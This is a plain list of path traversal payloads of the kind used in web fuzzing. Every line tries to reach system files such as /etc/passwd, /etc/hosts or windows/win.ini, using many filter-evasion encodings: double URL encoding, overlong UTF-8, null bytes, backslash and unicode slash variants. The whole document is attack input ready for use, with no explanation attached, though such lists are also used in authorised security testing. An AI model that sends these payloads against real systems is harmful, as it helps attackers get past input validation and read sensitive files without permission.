....//....//....//....//etc/passwd
....//....//....//....//etc/hosts
....//....//....//....//etc/hostname
....//....//....//....//windows/win.ini
..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/etc/hosts
..;/..;/..;/..;/windows/win.ini
..%2f..%2f..%2f..%2fetc/passwd
..%2f..%2f..%2f..%2fetc/hosts
..%2f..%2f..%2f..%2fwindows/win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252f..%252f..%252f..%252fetc/passwd
..%252f..%252f..%252f..%252fwindows/win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd
..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd
..%5c..%5c..%5c..%5cetc/passwd
..%255c..%255c..%255c..%255cetc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
....\/....\/....\/....\/etc/passwd
..../..../..../..../etc/passwd
....\\....\\....\\....\\etc/passwd
..%00/..%00/..%00/..%00/etc/passwd
/%5C../%5C../%5C../%5C../etc/passwd
\..\\..\\..\\..\\etc/passwd
..%u2215..%u2215..%u2215etc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
..0x2f..0x2f..0x2f..0x2fetc/passwd
..%bg%qf..%bg%qf..%bg%qfetc/passwd
..%25c0%25af..%25c0%25af..%25c0%25afetc/passwd
..%25c1%259c..%25c1%259c..%25c1%259cetc/passwd
